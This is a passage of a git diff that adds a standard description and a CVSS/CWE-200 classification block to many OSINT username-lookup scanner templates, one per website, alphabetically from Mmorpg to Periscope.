CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,mixlr self-contained: true diff --git a/osint/mmorpg.yaml b/osint/mmorpg.yaml index ea0a0c7a93..8bf886d296 100644 --- a/osint/mmorpg.yaml +++ b/osint/mmorpg.yaml @@ -3,7 +3,12 @@ id: mmorpg info: name: Mmorpg author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,mmorpg self-contained: true diff --git a/osint/mod-db.yaml b/osint/mod-db.yaml index 181ad5bb62..5b62250433 100644 --- a/osint/mod-db.yaml +++ b/osint/mod-db.yaml @@ -3,7 +3,12 @@ id: mod-db info: name: Mod DB author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,mod-db self-contained: true diff --git a/osint/moneysavingexpert.yaml b/osint/moneysavingexpert.yaml index 41fd877713..57e2c6d7db 100644 --- a/osint/moneysavingexpert.yaml +++ b/osint/moneysavingexpert.yaml @@ -3,7 +3,12 @@ id: moneysavingexpert info: name: Moneysavingexpert author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,moneysavingexpert self-contained: true diff --git a/osint/motokiller.yaml b/osint/motokiller.yaml index 8d68553eec..a7273e9cbd 100644 --- a/osint/motokiller.yaml +++ b/osint/motokiller.yaml @@ -3,7 +3,12 @@ id: motokiller info: name: Motokiller author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,motokiller self-contained: true diff --git a/osint/moxfield.yaml b/osint/moxfield.yaml index 384b2bbc83..025c703519 100644 --- a/osint/moxfield.yaml +++ b/osint/moxfield.yaml @@ -3,7 +3,12 @@ id: moxfield info: name: moxfield author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,moxfield self-contained: true diff --git a/osint/muck-rack.yaml b/osint/muck-rack.yaml index 748873b5e0..03418455ca 100644 --- a/osint/muck-rack.yaml +++ b/osint/muck-rack.yaml @@ -3,7 +3,12 @@ id: muck-rack info: name: Muck Rack author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,muck-rack self-contained: true diff --git a/osint/musiciansocial-mastodon-instance.yaml b/osint/musiciansocial-mastodon-instance.yaml index 180d082de6..043ebabf79 100644 --- a/osint/musiciansocial-mastodon-instance.yaml +++ b/osint/musiciansocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: musiciansocial-mastodon-instance info: name: Musician.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,musiciansocial-mastodon-instance self-contained: true diff --git a/osint/musictraveler.yaml b/osint/musictraveler.yaml index 2cd022696d..e6a22cffd3 100644 --- a/osint/musictraveler.yaml +++ b/osint/musictraveler.yaml @@ -3,7 +3,12 @@ id: musictraveler info: name: musictraveler author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,musictraveler self-contained: true diff --git a/osint/my-instants.yaml b/osint/my-instants.yaml index 1067014d1f..b321502150 100644 --- a/osint/my-instants.yaml +++ b/osint/my-instants.yaml @@ -3,7 +3,12 @@ id: my-instants info: name: my_instants author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,my-instants self-contained: true diff --git a/osint/myanimelist.yaml b/osint/myanimelist.yaml index e622058722..4a855e8a0f 100644 --- a/osint/myanimelist.yaml +++ b/osint/myanimelist.yaml @@ -3,7 +3,12 @@ id: myanimelist info: name: MyAnimeList author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,myanimelist self-contained: true diff --git a/osint/mybuildercom.yaml b/osint/mybuildercom.yaml index 534263cfc7..42c4e7dcea 100644 --- a/osint/mybuildercom.yaml +++ b/osint/mybuildercom.yaml @@ -3,7 +3,12 @@ id: mybuildercom info: name: MyBuilder.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mybuildercom self-contained: true diff --git a/osint/myfitnesspal-author.yaml b/osint/myfitnesspal-author.yaml index d9cef8f5ec..5522be1c87 100644 --- a/osint/myfitnesspal-author.yaml +++ b/osint/myfitnesspal-author.yaml @@ -3,7 +3,12 @@ id: myfitnesspal-author info: name: MyFitnessPal Author author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,myfitnesspal-author self-contained: true diff --git a/osint/myfitnesspal-community.yaml b/osint/myfitnesspal-community.yaml index fadad89ac5..6f7923c4ea 100644 --- a/osint/myfitnesspal-community.yaml +++ b/osint/myfitnesspal-community.yaml @@ -3,7 +3,12 @@ id: myfitnesspal-community info: name: MyFitnessPal Community author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,myfitnesspal-community self-contained: true diff --git a/osint/mylot.yaml b/osint/mylot.yaml index 742bf89446..74030e82ae 100644 --- a/osint/mylot.yaml +++ b/osint/mylot.yaml @@ -3,7 +3,12 @@ id: mylot info: name: MyLot author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mylot self-contained: true diff --git a/osint/mymfans.yaml b/osint/mymfans.yaml index 47c0fe7dc0..83374456d7 100644 --- a/osint/mymfans.yaml +++ b/osint/mymfans.yaml @@ -3,7 +3,12 @@ id: mymfans info: name: mym.fans author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,mymfans self-contained: true diff --git a/osint/myportfolio.yaml b/osint/myportfolio.yaml index ea6c548a80..05ec5ef75f 100644 --- a/osint/myportfolio.yaml +++ b/osint/myportfolio.yaml @@ -3,7 +3,12 @@ id: myportfolio info: name: myportfolio author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,myportfolio self-contained: true diff --git a/osint/myspace.yaml b/osint/myspace.yaml index 001fed1137..d586b77dfd 100644 --- a/osint/myspace.yaml +++ b/osint/myspace.yaml @@ -3,7 +3,12 @@ id: myspace info: name: MySpace author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,myspace self-contained: true diff --git a/osint/myspreadshop.yaml b/osint/myspreadshop.yaml index 6bcb5d10dc..d08e0c844d 100644 --- a/osint/myspreadshop.yaml +++ b/osint/myspreadshop.yaml @@ -3,7 +3,12 @@ id: myspreadshop info: name: Myspreadshop author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,myspreadshop self-contained: true diff --git a/osint/naija-planet.yaml b/osint/naija-planet.yaml index eb457ed392..91f2e37167 100644 --- a/osint/naija-planet.yaml +++ b/osint/naija-planet.yaml @@ -3,7 +3,12 @@ id: naija-planet info: name: naija_planet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,naija-planet self-contained: true diff --git a/osint/nairaland.yaml b/osint/nairaland.yaml index f62c31e1b7..749ea44c94 100644 --- a/osint/nairaland.yaml +++ b/osint/nairaland.yaml @@ -3,7 +3,12 @@ id: nairaland info: name: nairaland author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,nairaland self-contained: true diff --git a/osint/naturalnews.yaml b/osint/naturalnews.yaml index 6751af10c3..9e817ac6f8 100644 --- a/osint/naturalnews.yaml +++ b/osint/naturalnews.yaml @@ -3,7 +3,12 @@ id: naturalnews info: name: NaturalNews author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,naturalnews self-contained: true diff --git a/osint/naver.yaml b/osint/naver.yaml index e86d72e861..caf99b17d9 100644 --- a/osint/naver.yaml +++ b/osint/naver.yaml @@ -3,7 +3,12 @@ id: naver info: name: Naver author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,naver self-contained: true diff --git a/osint/netvibes.yaml b/osint/netvibes.yaml index bc7889af3c..9cc2677af0 100644 --- a/osint/netvibes.yaml +++ b/osint/netvibes.yaml @@ -3,7 +3,12 @@ id: netvibes info: name: netvibes author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,netvibes self-contained: true diff --git a/osint/newgrounds.yaml b/osint/newgrounds.yaml index f68f8bbd12..c1d0218a7a 100644 --- a/osint/newgrounds.yaml +++ b/osint/newgrounds.yaml @@ -3,7 +3,12 @@ id: newgrounds info: name: Newgrounds author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,newgrounds self-contained: true diff --git a/osint/newmeet.yaml b/osint/newmeet.yaml index 5a93a9c218..5d01cbd52a 100644 --- a/osint/newmeet.yaml +++ b/osint/newmeet.yaml @@ -3,7 +3,12 @@ id: newmeet info: name: newmeet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,newmeet self-contained: true diff --git a/osint/nihbuatjajan.yaml b/osint/nihbuatjajan.yaml index 13ef9e89db..66ad622d29 100644 --- a/osint/nihbuatjajan.yaml +++ b/osint/nihbuatjajan.yaml @@ -3,7 +3,12 @@ id: nihbuatjajan info: name: nihbuatjajan author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,nihbuatjajan self-contained: true diff --git a/osint/nitecrew-mastodon-instance.yaml b/osint/nitecrew-mastodon-instance.yaml index 72bd544154..b7a8c1de6a 100644 --- a/osint/nitecrew-mastodon-instance.yaml +++ b/osint/nitecrew-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: nitecrew-mastodon-instance info: name: Nitecrew (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,nitecrew-mastodon-instance self-contained: true diff --git a/osint/nnru.yaml b/osint/nnru.yaml index a532b2e710..e3ee4df6ba 100644 --- a/osint/nnru.yaml +++ b/osint/nnru.yaml @@ -3,7 +3,12 @@ id: nnru info: name: nnru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,nnru self-contained: true diff --git a/osint/notabug.yaml b/osint/notabug.yaml index 21fabf0cae..0b6693d33b 100644 --- a/osint/notabug.yaml +++ b/osint/notabug.yaml @@ -3,7 +3,12 @@ id: notabug info: name: NotABug author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,notabug self-contained: true diff --git a/osint/note.yaml b/osint/note.yaml index e7ef706725..60c748691a 100644 --- a/osint/note.yaml +++ b/osint/note.yaml @@ -3,7 +3,12 @@ id: note info: name: Note author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,note self-contained: true diff --git a/osint/oglaszamy24hpl.yaml b/osint/oglaszamy24hpl.yaml index 8058fb812e..d805c588b0 100644 --- a/osint/oglaszamy24hpl.yaml +++ b/osint/oglaszamy24hpl.yaml @@ -3,7 +3,12 @@ id: oglaszamy24hpl info: name: oglaszamy24h.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,oglaszamy24hpl self-contained: true diff --git a/osint/ogugg.yaml b/osint/ogugg.yaml index 3818dbc853..8394822fc4 100644 --- a/osint/ogugg.yaml +++ b/osint/ogugg.yaml @@ -3,7 +3,12 @@ id: ogugg info: name: ogu.gg author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,ogugg self-contained: true diff --git a/osint/okidoki.yaml b/osint/okidoki.yaml index b88a25b713..004dbab878 100644 --- a/osint/okidoki.yaml +++ b/osint/okidoki.yaml @@ -3,7 +3,12 @@ id: okidoki info: name: okidoki author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,okidoki self-contained: true diff --git a/osint/okru.yaml b/osint/okru.yaml index 16602e2b2f..544f08c6f4 100644 --- a/osint/okru.yaml +++ b/osint/okru.yaml @@ -3,7 +3,12 @@ id: okru info: name: ok.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,okru self-contained: true diff --git a/osint/olx.yaml b/osint/olx.yaml index 1f3176a364..a290714da7 100644 --- a/osint/olx.yaml +++ b/osint/olx.yaml @@ -3,7 +3,12 @@ id: olx info: name: olx author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,olx self-contained: true diff --git a/osint/omlet.yaml b/osint/omlet.yaml index 03020ef2be..0d557a840a 100644 --- a/osint/omlet.yaml +++ b/osint/omlet.yaml @@ -3,7 +3,12 @@ id: omlet info: name: omlet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,omlet self-contained: true diff --git a/osint/opencollective.yaml b/osint/opencollective.yaml index f5adeb4d88..a5cee7b324 100644 --- a/osint/opencollective.yaml +++ b/osint/opencollective.yaml @@ -3,7 +3,12 @@ id: opencollective info: name: Opencollective author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,opencollective self-contained: true diff --git a/osint/opensource.yaml b/osint/opensource.yaml index 47f2618c84..962c12b9de 100644 --- a/osint/opensource.yaml +++ b/osint/opensource.yaml @@ -3,7 +3,12 @@ id: opensource info: name: opensource author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,opensource self-contained: true diff --git a/osint/openstreetmap.yaml b/osint/openstreetmap.yaml index 2e6ba7078a..1a8b3714d3 100644 --- a/osint/openstreetmap.yaml +++ b/osint/openstreetmap.yaml @@ -3,7 +3,12 @@ id: openstreetmap info: name: OpenStreetMap author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,openstreetmap self-contained: true diff --git a/osint/opgg.yaml b/osint/opgg.yaml index c7519a2033..080a2cd2ad 100644 --- a/osint/opgg.yaml +++ b/osint/opgg.yaml @@ -3,7 +3,12 @@ id: opgg info: name: OPGG author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,opgg self-contained: true diff --git a/osint/orbys.yaml b/osint/orbys.yaml index 0a29148e72..5dc7309077 100644 --- a/osint/orbys.yaml +++ b/osint/orbys.yaml @@ -3,7 +3,12 @@ id: orbys info: name: Orbys author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,orbys self-contained: true diff --git a/osint/osu.yaml b/osint/osu.yaml index f17f46665f..54984b828c 100644 --- a/osint/osu.yaml +++ b/osint/osu.yaml @@ -3,7 +3,12 @@ id: osu info: name: osu! author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,osu self-contained: true diff --git a/osint/our-freedom-book.yaml b/osint/our-freedom-book.yaml index 52b6d762f0..c877fc4614 100644 --- a/osint/our-freedom-book.yaml +++ b/osint/our-freedom-book.yaml @@ -3,7 +3,12 @@ id: our-freedom-book info: name: Our Freedom Book author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,our-freedom-book self-contained: true diff --git a/osint/owly.yaml b/osint/owly.yaml index 6ba524a37d..859ebb0ec0 100644 --- a/osint/owly.yaml +++ b/osint/owly.yaml @@ -3,7 +3,12 @@ id: owly info: name: ow.ly author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,owly self-contained: true diff --git a/osint/palnet.yaml b/osint/palnet.yaml index a95f015b78..64af0f094f 100644 --- a/osint/palnet.yaml +++ b/osint/palnet.yaml @@ -3,7 +3,12 @@ id: palnet info: name: palnet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,palnet self-contained: true diff --git a/osint/parler-archived-posts.yaml b/osint/parler-archived-posts.yaml index bac0fe474c..adba436995 100644 --- a/osint/parler-archived-posts.yaml +++ b/osint/parler-archived-posts.yaml @@ -3,7 +3,12 @@ id: parler-archived-posts info: name: Parler archived posts author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-archived,parler-archived-posts self-contained: true diff --git a/osint/parler-archived-profile.yaml b/osint/parler-archived-profile.yaml index 0aee251622..50a0165839 100644 --- a/osint/parler-archived-profile.yaml +++ b/osint/parler-archived-profile.yaml @@ -3,7 +3,12 @@ id: parler-archived-profile info: name: Parler archived profile author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-archived,parler-archived-profile self-contained: true diff --git a/osint/parler.yaml b/osint/parler.yaml index 7ca41b6f09..936a042338 100644 --- a/osint/parler.yaml +++ b/osint/parler.yaml @@ -3,7 +3,12 @@ id: parler info: name: Parler author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,parler self-contained: true diff --git a/osint/pastebin.yaml b/osint/pastebin.yaml index 693cfa9572..8fd597031d 100644 --- a/osint/pastebin.yaml +++ b/osint/pastebin.yaml @@ -3,7 +3,12 @@ id: pastebin info: name: Pastebin author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,pastebin self-contained: true diff --git a/osint/patch.yaml b/osint/patch.yaml index 6170f5163c..812f09dbc8 100644 --- a/osint/patch.yaml +++ b/osint/patch.yaml @@ -3,7 +3,12 @@ id: patch info: name: patch author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,patch self-contained: true diff --git a/osint/patientslikeme.yaml b/osint/patientslikeme.yaml index bc906a195e..edafe99285 100644 --- a/osint/patientslikeme.yaml +++ b/osint/patientslikeme.yaml @@ -3,7 +3,12 @@ id: patientslikeme info: name: PatientsLikeMe author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,patientslikeme self-contained: true diff --git a/osint/patreon.yaml b/osint/patreon.yaml index 08491d6891..13344b37d1 100644 --- a/osint/patreon.yaml +++ b/osint/patreon.yaml @@ -3,7 +3,12 @@ id: patreon info: name: Patreon author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,patreon self-contained: true diff --git a/osint/patriots-win.yaml b/osint/patriots-win.yaml index 2d8906535d..d5f6c0e3a5 100644 --- a/osint/patriots-win.yaml +++ b/osint/patriots-win.yaml @@ -3,7 +3,12 @@ id: patriots-win info: name: Patriots Win author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,patriots-win self-contained: true diff --git a/osint/patronite.yaml b/osint/patronite.yaml index 3bae321e90..b4b8ba4270 100644 --- a/osint/patronite.yaml +++ b/osint/patronite.yaml @@ -3,7 +3,12 @@ id: patronite info: name: Patronite author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,patronite self-contained: true diff --git a/osint/paypal.yaml b/osint/paypal.yaml index d066886548..28a819685e 100644 --- a/osint/paypal.yaml +++ b/osint/paypal.yaml @@ -3,7 +3,12 @@ id: paypal info: name: Paypal author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,paypal self-contained: true diff --git a/osint/pcgamer.yaml b/osint/pcgamer.yaml index d9a078b5ee..c2ebd43e35 100644 --- a/osint/pcgamer.yaml +++ b/osint/pcgamer.yaml @@ -3,7 +3,12 @@ id: pcgamer info: name: PCGamer author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,pcgamer self-contained: true diff --git a/osint/pcpartpicker.yaml b/osint/pcpartpicker.yaml index 17992bcb06..46d85af3c6 100644 --- a/osint/pcpartpicker.yaml +++ b/osint/pcpartpicker.yaml @@ -3,7 +3,12 @@ id: pcpartpicker info: name: PCPartPicker author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,pcpartpicker self-contained: true diff --git a/osint/peing.yaml b/osint/peing.yaml index caad402489..325c146350 100644 --- a/osint/peing.yaml +++ b/osint/peing.yaml @@ -3,7 +3,12 @@ id: peing info: name: Peing author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,peing self-contained: true diff --git a/osint/periscope.yaml b/osint/periscope.yaml index a71aff8716..f5d68b797b 100644 --- a/osint/periscope.yaml +++ b/osint/periscope.yaml @@ -3,7 +3,12 @@ id: periscope info: name: Periscope author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,periscope self-contained: true diff --git a/osint/pettingzooco-mastodon-instance.yaml 